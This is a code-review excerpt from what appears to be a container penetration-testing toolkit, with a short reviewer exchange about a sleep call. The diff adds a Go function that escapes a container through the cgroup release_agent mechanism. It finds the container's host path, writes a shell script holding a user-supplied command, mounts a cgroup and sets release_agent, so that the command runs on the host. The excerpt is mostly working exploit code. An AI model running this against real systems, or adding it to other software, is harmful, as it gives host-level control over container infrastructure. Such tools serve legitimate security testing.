pkg/exploit/mount_cgroup.go

```diff
@@ -33,55 +39,116 @@ import (
-	var outFile = fmt.Sprintf("exploit_%s.sh", taskRandString)
-	log.Printf("generate shell exploit with user-input cmd: \n\n%s\n", cmd)
+func EscapeCgroup(cmd string, subSystemName string) error {
+	// hostPath for write release_agent path
+	var hostPath string
+	// read /proc/self/mountinfo instead of /etc/mtab, since former one is already implemented
+	mountedDevs, err := util.GetMountInfo()
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "unable to read mountinfo"}
+	}
+	// loop through all mounted devices
+	for _, i := range mountedDevs {
+		if i.Fstype == "overlay" && i.MountPoint == "/" {
+			for _, j := range i.SuperBlockOptions {
+				hasUpper := strings.Contains(j, "upperdir=")
+				if hasUpper {
+					// found
+					hostPath = j[9:]
+					log.Println("Found hostpath: " + hostPath)
+					break
+				}
+			}
+		}
+	}
+
+	if len(hostPath) == 0 {
+		return &errors.CDKRuntimeError{
+			Err:       nil,
+			CustomMsg: "container filesystem path on host cannot be found",
+		}
+	}
+
+	// generate release_agent shell script and save to local
+	var taskRandString, expShellText = generateShellExp(hostPath, cmd)
+	// even in container, you should save to a writable path
+	var outFile = fmt.Sprintf("/cdk_cgexp_%s.sh", taskRandString)
+	log.Printf("generate shell exploit with user-input cmd: \n\n%s\n\n", cmd)
+	fmt.Printf("final shell exploit is: \n\n")
 	fmt.Println(expShellText)
 
-	err := ioutil.WriteFile(outFile, []byte(expShellText), 0777)
+	err = ioutil.WriteFile(outFile, []byte(expShellText), 0777)
 	if err != nil {
 		return &errors.CDKRuntimeError{Err: err, CustomMsg: "write shell exploit failed"}
 	}
-
 	log.Printf("shell script saved to %s", outFile)
-	err = util.ShellExec(outFile)
 
+	// create mountpoint
+	mountPointPath := "/tmp/cgrp_" + taskRandString
+	subgroupName := "/x_" + taskRandString
+	err = os.Mkdir(mountPointPath, DefaultFolderPerm)
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "cannot create mountpoint"}
+	}
+	// mount cgroup
+	err = syscall.Mount("cgroup", mountPointPath, "cgroup", 0, subSystemName)
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "mount syscall failed"}
+	}
+	// create sub-cgroup: task group x
+	err = os.Mkdir(mountPointPath+subgroupName, DefaultFolderPerm)
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "subgroup cannot be created"}
+	}
+	// enable notify_on_release
+	err = ioutil.WriteFile(mountPointPath+subgroupName+"/notify_on_release", []byte("1"), 0644)
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "cannot enable notify_on_release"}
+	}
+	// write release_agent
+	err = ioutil.WriteFile(mountPointPath+"/release_agent", []byte(hostPath+outFile), 0644)
+	if err != nil {
+		return &errors.CDKRuntimeError{Err: err, CustomMsg: "release_agent is not writable"}
+	}
+
+	// trigger release
+	// sleep 2s for debug purpose
+	addProcCmd := exec.Command("/bin/sh", "-c", "sleep 2")
```

Comment:
why sleep here？

Reply:
Well it need some time to read the PID of spawned `/bin/sh`, And also  use `/bin/sh -c echo $$` then put the command stdout to `cgroup.procs` will cause unknown reason error with exit code 1. So I use another way to achieve this. 

You could also monitor this behaviour by adding auditd rule `-a always,exit -F arch=b64 -S execve -F key=procmo` which made debug much more easier than before.